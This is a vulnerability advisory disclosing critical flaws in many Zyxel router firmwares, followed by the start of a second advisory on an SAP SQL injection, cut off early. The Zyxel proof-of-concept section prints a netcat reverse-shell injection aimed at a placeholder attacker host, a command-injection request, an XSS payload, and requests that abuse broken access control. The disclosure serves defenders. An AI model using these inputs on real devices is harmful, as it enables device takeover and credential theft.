<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220215-0 ><br />=======================================================================<br /> title: Multiple Critical Vulnerabilities<br /> product: Multiple Zyxel devices<br /> vulnerable version: For affected products see "Solution" section<br /> fixed version: see "Solution" section<br /> CVE number: -<br /> impact: Critical<br /> homepage: https://www.zyxel.com<br /> found: 2020-11-27<br /> by: G. Hechenberger (Office Vienna)<br /> S. Robertz (Office Vienna)<br /> S. Viehböck (Office Vienna)<br /> T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br /><br />"Focused on innovation and customer-centricity, Zyxel Communications Corp. has<br />been connecting people to the internet for nearly 30 years. We keep promoting<br />creativity which meets the needs of customers. This spirit has never been<br />changed since we developed the world's first integrated 3-in-1 data/fax/voice<br />modem in 1992. Our ability to adapt and innovate with networking technology<br />places us at the forefront of understanding connectivity for telco/service<br />providers, businesses and home users.<br /><br />We're building the networks of tomorrow, helping unlock the world's potential<br />and meeting the needs of the modern workplace; powering people at work, life<br />and play. We stand side-by-side with our customers and partners to share new<br />approaches to networking that will unleash their abilities. 
Loyal friend,<br />powerful ally, reliable resource — we are Zyxel, Your Networking Ally."<br /><br />Source: https://www.zyxel.com/about_zyxel/company_overview.shtml<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends that Zyxel customers upgrade the firmware to the latest<br />version available.<br /><br />The collaboration between Zyxel Communications and SEC Consult will further strengthen<br />Zyxel's cybersecurity strategy by accelerating and optimizing the ability to respond<br />to threats and vulnerabilities like those described in this advisory.<br /><br />https://sec-consult.com/blog/detail/zyxel-communications-and-sec-consult-reach-next-level-of-cybersecurity/<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so<br />Multiple unauthenticated buffer overflows have been discovered in the zhttpd web<br />server. One buffer overflow is extremely simple to trigger as it occurs in the<br />URI input. In case of an overlong input, the web server crashes as the return<br />address is overwritten with the input values, because the function scanf() was<br />used without a length check. Multiple other buffer overflows can be found in the<br />following functionalities:<br />* URI parsing in libclinkc.so, if '?' is contained.<br />* Export_Log functionality.<br /><br />An attacker can take over the device by using the return-to-zero-protection<br />technique as ASLR in the used Linux kernel is activated system-wide and the NX<br />bit is set for the web server binary. Other protection mechanisms like PIE,<br />stack canaries and relocation read only were not set. The address of libc<br />shifts due to ASLR and therefore has to be brute-forced. This can take up to one<br />hour. 
However, on average, an attacker will gain a root shell in less than<br />30 minutes.<br /><br /><br />2) Unauthenticated Local File Disclosure in zhttpd<br />An endpoint in zhttpd can be used to expose system files including<br />"/etc/passwd" and "/etc/shadow". This endpoint is accessible without prior<br />login. An attacker can read all files on the system by using this endpoint.<br /><br /><br />3) Unsafe Storage of Sensitive Data<br />The device configuration contains passwords stored in a reversible form. Rather<br />than storing passwords in an appropriate cryptographic hash format, the<br />passwords are encrypted with a symmetric cipher (AES) using a static key. An<br />attacker with access to the device configuration (e.g. by exploiting vulnerability<br /> #2) can decrypt the passwords and use them in further attacks.<br /><br /><br />4) Authenticated Command Injection<br />Two command injections were found within the device. One was identified in the<br />ping diagnostic tool, the other one at the certificate upload. Both led to a<br />fully compromised system as the web service was started with root permissions.<br /><br />It is suspected that more command injections are present in the web interface<br />of the device.<br /><br /><br />5) Broken Access Control<br />Various access control vulnerabilities were identified where a lower privileged<br />user can access functionality of a higher privilege role.<br />Some functionality is visible in the GUI only if using a user account with full<br />access permissions. However, it is not visible as standard "admin" user with the<br />role administrator. It can be exploited, e.g., to open ports for system services<br />such as SSH and FTP and also to access other functionality intended to be used<br />by users with full access only.<br /><br /><br />6) Processing of Symbolic Links in ftpd<br />The FTP server on the device processes symbolic links on external storage<br />media, e.g. formatted as NTFS. 
By creating a symbolic link to the root directory,<br />this can be abused to get read access to the root file system.<br /><br /><br />7) Inadequate CSRF Implementation<br />The web interface provides CSRF tokens, which are implemented as 9-digit<br />numbers and are transmitted as "sessionkey" parameter. CSRF tokens rely on<br />unpredictability to fulfill their function. However, an API endpoint exists on<br />the device, which can be used in an unauthenticated manner to generate and<br />retrieve a new and valid CSRF token value over the internal network.<br /><br /><br />8) Stored Cross-Site Scripting<br />A stored cross-site scripting vulnerability was identified in the printer name<br />field of the print server menu within the web interface of the device. However,<br />the possible payload is limited to 32 characters and certain tags.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Multiple Unauthenticated Buffer Overflows in zhttpd and libclinkc.so<br /><br />URI parsing pseudo code in zhttpd:<br />-------------------------------------------------------------------------------<br />char path [256];<br />[...]<br />__s = (char *)cg_http_request_geturi(param_1);<br />pcVar2 = strstr(__s,"Export_Log");<br />if (pcVar2 != (char *)0x0) {<br />__isoc99_sscanf(__s,"%*[^?]?%s",path);<br />return;<br />}<br />-------------------------------------------------------------------------------<br />This code will copy everything following a '?' from the URI to a 256 byte<br />buffer. 
As URIs are commonly allowed to contain 2048 characters, the 'path'<br />buffer can be overflowed.<br /><br />Proof of concept exploit that will obtain a root shell:<br />-------------------------------------------------------------------------------<br />< the remote root exploit has been removed from this advisory and will be<br /> published at a later date ><br />-------------------------------------------------------------------------------<br /><br />URI handling pseudo code, when '?' is present, in libclinkc.so, which is called<br />from zhttpd:<br />-------------------------------------------------------------------------------<br />char acStack144 [128];<br />pcVar2 = strchr(uri_ptr,'?');<br />if (pcVar2 != (char *)0x0) {<br />memset(acStack144,0,0x80);<br />strncpy(acStack144,uri_ptr,(size_t)(pcVar2 + -(int)uri_ptr));<br />-------------------------------------------------------------------------------<br />This buffer can be overflowed even though strncpy is used, as the copy length<br />parameter 'n' is user-controlled. The attacker will need to request a URL with<br />more than 128 characters followed by a '?'.<br /><br /><br />2) Unauthenticated Local File Disclosure in zhttpd<br />The endpoint "Export_Log" can be used to fetch arbitrary files as shown in the<br />following request that accesses the config file "/data/zcfg_config.json":<br />-------------------------------------------------------------------------------<br />< POC removed from this advisory ><br />-------------------------------------------------------------------------------<br /><br />This endpoint is accessible without prior authentication!<br /><br />The file '/data/zcfg_config.json' will contain the running configuration of the<br />router, including all passwords such as SIP credentials!<br /><br /><br />3) Unsafe Storage of Sensitive Data<br />There is a proprietary password format by Zyxel denoted by the prefix<br />"_encrypt_". 
This is implemented by the function encryptPassword in the binary<br />"/bin/zcmd". Values in the configuration fields named "Privilege", "Password",<br />"DefaultPassword" and "OldDefaultPassword" are passed to a function that<br />derives an AES key using the OpenSSL function EVP_BytesToKey from static data.<br />The following code snippets are a re-implementation of the key derivation<br />algorithm. The key has been removed from this advisory.<br />-------------------------------------------------------------------------------<br />#include <stdio.h><br />#include <string.h><br />#include <openssl/evp.h><br /><br />/* static salt and passphrase used by zcmd (values removed from this advisory) */<br />unsigned char salt[] = { 0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX,0xXX };<br />int encrypt_key_length;<br />char encryptKey[]= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";<br />encrypt_key_length = strlen(encryptKey);<br />unsigned char key[EVP_MAX_KEY_LENGTH], iv[EVP_MAX_IV_LENGTH];<br />int datal = encrypt_key_length;<br />/* 5 rounds of SHA-1 over passphrase+salt; AES-256-CBC uses the first 32 key<br /> bytes and 16 IV bytes of the output */<br />EVP_BytesToKey(EVP_aes_256_cbc(), EVP_sha1(), (const unsigned char*)salt,<br />(const unsigned char*)encryptKey, datal, 5, key, iv);<br />/* loops use "<", not "<=": "<=" would read one byte past each array */<br />for (int i = 0; i < EVP_MAX_KEY_LENGTH; i++) {<br />    printf("%02X", key[i]);<br />}<br />printf("\n");<br />for (int i = 0; i < EVP_MAX_IV_LENGTH; i++) {<br />    printf("%02X", iv[i]);<br />}<br />printf("\n");<br />-------------------------------------------------------------------------------<br />The input for the key derivation is static, so the resulting key and IV are<br />too. 
Based on this information, the following Python snippet was developed that<br />decrypts password entries (the key has been removed from this advisory):<br />-------------------------------------------------------------------------------<br />from base64 import b64decode<br />from Crypto.Cipher import AES  # PyCryptodome<br /><br />def decrypt_zyxel_encrypt(value):<br />    # static AES-256 key and IV as derived by EVP_BytesToKey (removed here)<br />    key = bytearray.fromhex(<br />        'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')<br />    iv = bytearray.fromhex('XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')<br />    # strip the "_encrypt_" marker, then base64-decode the AES-CBC ciphertext<br />    value = value.replace('_encrypt_', '')<br />    decoded = b64decode(value)<br />    aes = AES.new(key, AES.MODE_CBC, iv)<br />    decrypted = aes.decrypt(decoded)<br />    print(repr(decrypted))<br />-------------------------------------------------------------------------------<br />Decrypting the password can be done with the following command:<br /> >> decrypt_zyxel_encrypt('_encrypt_xxxxxxxxxxxxxxxxx==')<br /><br />The same password algorithm was discussed in the context of security research<br />on the Zyxel VMG8825-T50 before:<br />https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/<br /><br /><br />4) Authenticated Command Injection<br />The input vulnerable to command injection can be found in the menu at<br />MENU->Maintenance->Diagnostic. The following payload can now be used in the IP<br />address field to create a reverse shell:<br />127.0.0.1;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc Attacker-IP Attacker-Port >/tmp/f &<br /><br />The second identified possibility for a command injection was the certificate<br />upload. 
The endpoint is not visible from the UI for a regular user, however<br />due to the broken access control, see 5), every user can interact with it.<br /><br />-------------------------------------------------------------------------------<br />POST /cgi-bin/Certificates?action=import_local&priv=;touch${IFS}foo&sessionkey=409106100 HTTP/1.1<br />Host: <IP><br />Connection: close<br />Content-Length: 1498<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywlxAsQZ1maK9V9E9<br />Accept: */*<br />Origin: https://<IP><br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://<IP>/Certificates<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: Session=uUgQobZKw5cUzesePtCAGhyxH3SOCE8W<br />------WebKitFormBoundarywlxAsQZ1maK9V9E9<br />Content-Disposition: form-data; name="certImportFileName"; filename="ZyXELcert.crt"<br />Content-Type: application/pkix-cert<br />-----BEGIN CERTIFICATE-----<br />[...]<br />-----END CERTIFICATE-----<br />------WebKitFormBoundarywlxAsQZ1maK9V9E9--<br />-------------------------------------------------------------------------------<br /><br />5) Broken Access Control<br /><br />As a first example, available user accounts and their privileges can be viewed<br />by sending a request to the following API endpoint:<br />https://<IP>/cgi-bin/DAL?oid=login_privilege<br />The response shows usernames invisible in the GUI, here e.g., the "root" user.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: application/json<br />Content-Length: 2906<br />Date: Thu, 01 Jan 1970 22:59:49 GMT<br />X-Frame-Options: sameorigin<br />Content-Security-Policy: frame-ancestors 'self'<br />X-Content-Type-Options: nosniff<br />X-XSS-Protection: 1; mode=block<br />{<br />"result": "ZCFG_SUCCESS",<br />"ReplyMsg": "Page",<br />"ReplyMsgMultiLang": "",<br 
/>"Object": [<br />{<br />"Index0": 1,<br />"Index1": 1,<br />"Enabled": true,<br />"Username": "root",<br />"Password": "",<br />"EnableQuickStart": true,<br />"Privilege": "login"<br />},<br />[...]<br />-------------------------------------------------------------------------------<br />As a second example, the status of system services can be viewed by sending a<br />request to the following API endpoint:<br />https://<IP>/cgi-bin/DAL?oid=mgmt_srv<br />The response shows various system services, here e.g., the SSH service which<br />is only open for a trusted domain ("Trust_Dm").<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: application/json<br />Content-Length: 1271<br />Date: Thu, 01 Jan 1970 02:18:28 GMT<br />X-Frame-Options: sameorigin<br />Content-Security-Policy: frame-ancestors 'self'<br />X-Content-Type-Options: nosniff<br />X-XSS-Protection: 1; mode=block<br />{<br />"result": "ZCFG_SUCCESS",<br />"ReplyMsg": "RestartDeamon",<br />"ReplyMsgMultiLang": "",<br />"Object": [<br />[...]<br />{<br />"Index": 5,<br />"Name": "SSH",<br />"Port": 22,<br />"Mode": "Trust_Dm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,"<br />},<br />[...]<br />-------------------------------------------------------------------------------<br />Subsequently, services can also be opened. An example request to open the FTP,<br />SSH and SNMP ports is given below. 
The request has to be sent in context of an<br />"admin" user and has to contain a valid "sessionkey" value.<br />-------------------------------------------------------------------------------<br />PUT /cgi-bin/DAL?oid=mgmt_srv&sessionkey=575595380 HTTP/1.1<br />Host: <IP><br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 2097<br />Origin: https://<IP><br />Connection: close<br />Referer: https://<IP>/RemoteManagement<br />Cookie: Session=6snfyaikMK5FmMcerni8cJEnzl4IgaFc<br />[<br />{<br />"Index": 1,<br />"Name": "HTTP",<br />"Port": 80,<br />"Mode": "LAN_ONLY",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 2,<br />"Name": "HTTPS",<br />"Port": 443,<br />"Mode": "LAN_TstDm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": true,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 3,<br />"Name": "FTP",<br />"Port": 21,<br />"Mode": "LAN_ONLY",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 4,<br />"Name": "TELNET",<br />"Port": 23,<br />"Mode": 
"",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 5,<br />"Name": "SSH",<br />"Port": 22,<br />"Mode": "LAN_TstDm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": true,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 6,<br />"Name": "SNMP",<br />"Port": 161,<br />"Mode": "LAN_ONLY",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": false,<br />"Protocol": "https",<br />"RestartDeamon": false<br />},<br />{<br />"Index": 7,<br />"Name": "PING",<br />"Port": -1,<br />"Mode": "LAN_TstDm",<br />"BoundInterfaceList":<br />"IP.Interface.9,IP.Interface.7,IP.Interface.5,IP.Interface.4,IP.Interface.3,,<br />,,IP.Interface.11,,,,",<br />"LANEnable": true,<br />"WLANEnable": true,<br />"WANEnable": false,<br />"TrustDmEnable": true,<br />"Protocol": "https",<br />"RestartDeamon": false,<br />"origport": 443,<br />"otherorigport": 80,<br />"httpport": 80,<br />"httpsport": 443<br />}<br />]<br />-------------------------------------------------------------------------------<br />The response will indicate success and the system will be restarted. 
Another<br />request to the API endpoint used before to query the service status will list<br />the changed SSH mode, now shown as "LAN_TstDm".<br /><br /><br />6) Processing of Symbolic Links in ftpd<br />A prepared USB stick, formatted as NTFS and containing a link to the root file<br />system (created by executing "ln -s / sysroot"), is needed to exploit this<br />vulnerability.<br /><br />After placing the USB stick in the USB port of the device, it is automatically<br />mounted to the admin user's home directory. By using the access control<br />vulnerability described in 5), the FTP port can be opened to allow FTP access via<br />the internal network.<br /><br />After connecting to the FTP service using the "admin" credentials, the mounted<br />USB stick can be accessed and the "sysroot" symbolic link will show the<br />content of the root file system.<br /><br /><br />7) Inadequate CSRF Implementation<br />The following API endpoint can be used without authentication to retrieve a<br />new CSRF token:<br />https://<IP>/changeSessionKey<br />The response contains the new session key, valid for all user accounts. The<br />current one will be invalidated.<br />-------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Content-Type: application/json<br />Content-Length: 43<br />Date: Thu, 01 Jan 1970 12:29:50 GMT<br />X-Frame-Options: sameorigin<br />Content-Security-Policy: frame-ancestors 'self'<br />X-Content-Type-Options: nosniff<br />X-XSS-Protection: 1; mode=block<br />[<br />{<br />"SessionKey": 583723980<br />}<br />]<br />-------------------------------------------------------------------------------<br /><br />8) Stored Cross-Site Scripting<br />By browsing to "MENU->Network Setting->USB Service->Print Server", the field<br />"User Defined Printer Name" can be used to place a stored cross-site scripting<br />payload. 
The following code was used as proof-of-concept:<br /><br />P<img src=x onerror=alert('XSS')><br /><br />In a PUT request, this action looks like the following listing in the proxy:<br />-------------------------------------------------------------------------------<br />PUT /cgi-bin/DAL?oid=print_server&sessionkey=578218320 HTTP/1.1<br />Host: <IP><br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />If-Modified-Since: Thu, 01 Jun 1970 00:00:00 GMT<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 106<br />Origin: <IP><br />Connection: close<br />Cookie: activeMenuID=maintain_settings; activeSubmenuID=log;<br />Session=Fg2kSHIfZW5mhySEY4vJfrElXE4TSLEl<br />{<br />"Enable":false,<br />"IppMake":"PRINTER",<br />"IppDevice":"/dev/printer0",<br />"IppName":"P<img src=x onerror=alert('XSS')>"<br />}<br />-------------------------------------------------------------------------------<br />The printer name will be stored and displayed on the same page, executing the<br />payload.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />Multiple devices are affected. See section "solution" for the list of affected models<br />provided by the vendor including the patched firmware version. All firmware older than<br />those listed are affected.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-01-21 | Contacting vendor via security@zyxel.com.tw. Received confirmation<br /> from Zyxel employee.<br />2021-02-09 | Zyxel confirms vulnerabilities and is working on a fix. Zyxel asks<br /> for more time; extended advisory disclosure date to 2021-05-20.<br />2021-04-09 | Asked for an update.<br />2021-04-13 | Zyxel stated that updates on the issues will be provided soon.<br />2021-04-28 | Phone call with Zyxel. 
Zyxel contact stated that all issues were<br /> resolved.<br />2021-05-01 | Zyxel stated that a status update will follow in the next weeks.<br />2021-05-19 | Zyxel PSIRT sent a list with feedback to all discovered issues.<br />2021-06-01 | Zyxel PSIRT updated the list and added a patch plan including timing.<br /> The earliest updates on the security issues were scheduled<br /> for Q3 2021.<br />2021-09-02 | Status meeting with Zyxel. The advisory disclosure shifts back to<br /> Q4 2021 due to more affected products.<br />2021-11-07 | Security advisory disclosure plan discussion with Zyxel. Vendor stated<br /> that more products must be internally reviewed. The advisory can be released<br /> in Q1 2022 if no further devices are affected.<br />2022-01-25 | Asking vendor regarding coordinated advisory release date.<br />2022-02-03 | Asking vendor again for a status update.<br />2022-02-07 | Vendor replied that affected models are still being consolidated.<br />2022-02-10 | Received final list of affected models.<br />2022-02-15 | Zyxel publishes their security advisory.<br />2022-02-15 | Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />Install the current version of the firmware for the affected product. 
According to the<br />vendor, the following firmware versions fix the identified security issues:<br /><br />Affected EOL products (list not necessarily complete) which will not get an update:<br /><br />AMG1302-T11C EOL<br />VMG3925-B10C EOL<br />VMG8924-B10D EOL<br />VMG1312-B10D EOL<br />VMG3312-T20A EOL<br />VMG3625-T20A EOL<br />VMG3925-B10B EOL<br />VMG3925-B10C EOL<br />VMG3925-B30C EOL<br />VMG3926-B10A EOL<br />VMG5313-B10B EOL<br />VMG5313-B30B EOL<br />VMG8623-T50A EOL<br />VMG8823-B10B EOL<br />VMG8823-B30B EOL<br />VMG8823-B50B EOL<br />VMG8823-B60B EOL<br />VMG8924-B10D EOL<br />VMG8924-B30D EOL<br />PMG5317-T20A EOL<br /><br /><br />Affected product Model / Patch availability<br />CPE:<br />DX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*<br />DX5401-B0 V5.17(ABYO.1)C0*<br />EMG3525-T50B EMEA - V5.50(ABPM.6)C0*<br /> S. America - V5.50(ABSL.0)b12 in Sep. 2022*<br />EMG5523-T50B EMEA - V5.50(ABPM.6)C0*<br /> S. America - V5.50(ABSL.0)b12 in Sep. 2022*<br />EMG5723-T50K V5.50(ABOM.7)C0*<br />EX3301-T0 V5.50(ABVY.3)C0 in Sep. 2022*<br />EX5401-B0 V5.17(ABYO.1)C0*<br />EX5501-B0 V5.17(ABRY.2)C0*<br />LTE3301-PLUS V1.00(ABQU.3)C0*<br />LTE7240-M403 V2.00(ABMG.4)C0*<br />VMG1312-T20B V5.50(ABSB.5)C0*<br />VMG3625-T50B V5.50(ABPM.6)C0*<br />VMG3927-B50A V5.17(ABMT.6)C0*<br />VMG3927-B60A V5.17(ABMT.6)C0*<br />VMG3927-T50K V5.50(ABOM.7)C0*<br />VMG4005-B50A V5.15(ABQA.2)C0 in Mar. 2022*<br />VMG8623-T50B V5.50(ABPM.6)C0*<br />VMG8825-B50A V5.17(ABMT.6)C0*<br />VMG8825-B50B V5.17(ABNY.7)C0*<br />VMG8825-B60A V5.17(ABMT.6)C0*<br />VMG8825-B60B V5.17(ABNY.7)C0*<br />VMG8825-T50K V5.50(ABOM.7)C0*<br />XMG3927-B50A V5.17(ABMT.6)C0*<br />XMG8825-B50A V5.17(ABMT.6)C0*<br /><br />Firewall:<br />VPN2S V1.20(ABLN.2)_00210319C1*<br /><br />ONT:<br />AX7501-B0 V5.17(ABPC.1)C0*<br />EP240P V5.40(ABVH.1)C0 in May 2022*<br />PMG5317-T20B V5.40(ABKI.4)C0 in Apr. 2022*<br />PMG5617GA V5.40(ABNA.2)C0 in Apr. 2022*<br />PMG5622GA V5.40(ABNB.2)C0 in Apr. 
2022*<br /><br />WiFi extender:<br />WX3100-T0 V5.50(ABVL.1)C0 in Mar. 2022*<br />WX3401-B0 V5.17(ABVE.1)C0*<br /><br />WiFi system:<br />WSQ50 (Multy X) V2.20(ABKJ.7)C0<br />WSQ60 (Multy Plus) V2.20(ABND.8)C0<br /><br />*Please reach out to your local Zyxel support team for the updated firmware file.<br /><br /><br />For further information, please see the vendor's advisory as well:<br />https://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities.shtml<br /><br />Page from the vendor regarding affected devices:<br />https://www.zyxel.com/support/Zyxel-security-advisory-for-multiple-vulnerabilities_Products.shtml<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF G. Hechenberger, S. Robertz, S. Viehböck, T. Weber / @2022<br /><br /><br /></code></pre>
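The two URI handling patterns from 1) of the Zyxel advisory above, each beside a bounded replacement, as an added example that is not code from the advisory or from Zyxel. The 256- and 128-byte sizes follow the advisory's pseudo code; the function names and sample URIs are constructed for illustration.

```c
/* Added example (not code from the advisory or from Zyxel): the two URI
 * handling patterns described in 1), each beside a bounded replacement.
 * Buffer sizes follow the advisory's pseudo code; names and sample inputs
 * are constructed for illustration. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define PATH_LEN   256   /* zhttpd:        char path[256]        */
#define PREFIX_LEN 128   /* libclinkc.so:  char acStack144[128]  */

/* Pattern 1 (zhttpd Export_Log handler):
 *     sscanf(uri, "%*[^?]?%s", path);
 * "%s" carries no width, so everything after '?' is written into path[256]
 * no matter how long the URI is. The bounded form below returns -1 instead
 * of truncating silently when the query part does not fit. */
int export_log_path(const char *uri, char *path, size_t pathsz)
{
    const char *q = strchr(uri, '?');
    if (q == NULL)
        return -1;                         /* no query part at all */
    q++;                                   /* skip the '?' */
    size_t n = strcspn(q, " \t\r\n\v\f");  /* like %s, stop at whitespace */
    if (n == 0 || n >= pathsz)
        return -1;                         /* empty, or would overflow */
    memcpy(path, q, n);
    path[n] = '\0';
    return 0;
}

/* Pattern 2 (libclinkc.so, URI containing '?'):
 *     strncpy(buf, uri, q - uri);
 * strncpy is bounded by its third argument, but here that argument is the
 * request-controlled distance to '?', not the size of buf. The fix bounds
 * the copy by the destination and rejects inputs that do not fit. */
int uri_prefix(const char *uri, char *buf, size_t bufsz)
{
    const char *q = strchr(uri, '?');
    size_t n = (q != NULL) ? (size_t)(q - uri) : strlen(uri);
    if (n >= bufsz)
        return -1;                         /* prefix longer than buffer */
    memcpy(buf, uri, n);
    buf[n] = '\0';                         /* strncpy would not guarantee this */
    return 0;
}

/* Constructed request: "/Export_Log?" followed by qlen bytes of 'A'. */
int try_query_of_length(size_t qlen)
{
    char uri[2048], path[PATH_LEN];
    if (qlen + 13 > sizeof uri)
        return -2;
    memcpy(uri, "/Export_Log?", 12);
    memset(uri + 12, 'A', qlen);
    uri[12 + qlen] = '\0';
    return export_log_path(uri, path, sizeof path);
}

/* Constructed request: plen bytes of 'B' followed by a single '?'. */
int try_prefix_of_length(size_t plen)
{
    char uri[2048], buf[PREFIX_LEN];
    if (plen + 2 > sizeof uri)
        return -2;
    memset(uri, 'B', plen);
    uri[plen] = '?';
    uri[plen + 1] = '\0';
    return uri_prefix(uri, buf, sizeof buf);
}

int main(void)
{
    char path[PATH_LEN], prefix[PREFIX_LEN];

    if (export_log_path("/Export_Log?syslog.txt", path, sizeof path) == 0)
        printf("path   = %s\n", path);
    if (uri_prefix("/Export_Log?syslog.txt", prefix, sizeof prefix) == 0)
        printf("prefix = %s\n", prefix);

    /* the overlong inputs from the advisory are now rejected, not copied */
    printf("300-byte query  -> %d\n", try_query_of_length(300));
    printf("200-byte prefix -> %d\n", try_prefix_of_length(200));
    return 0;
}
```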
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211214-0 ><br />==============================================================================<br /> title: Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG<br /> product: SAP Netweaver<br /> vulnerable version: see vulnerable/tested versions section below<br /> fixed version: see solution section below<br /> CVE number: CVE-2021-33701<br /> SAP SNote: 3078312<br /> impact: Critical<br /> CVSS 3.1 Score: 9.1<br /> CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H<br /> homepage: https://www.sap.com/<br /> found: 2021-07-07<br /> by: Raschin Tavakoli (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />==============================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP SE is a German multinational software corporation based in Walldorf,<br />Baden-Württemberg, that develops enterprise software to manage business<br />operations and customer relations. The company is especially known for its ERP<br />software. SAP is the largest non-American software company by revenue, the<br />world's third-largest publicly-traded software company by revenue, and the<br />largest German company by market capitalisation."<br /><br />Source: https://en.wikipedia.org/wiki/SAP<br /><br /><br />Business recommendation:<br />------------------------<br />SAP® released the patch (SNote 3078312) and SEC Consult advises all<br />SAP® customers to update their systems immediately.<br /><br />An in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected by further security issues.<br /><br /><br 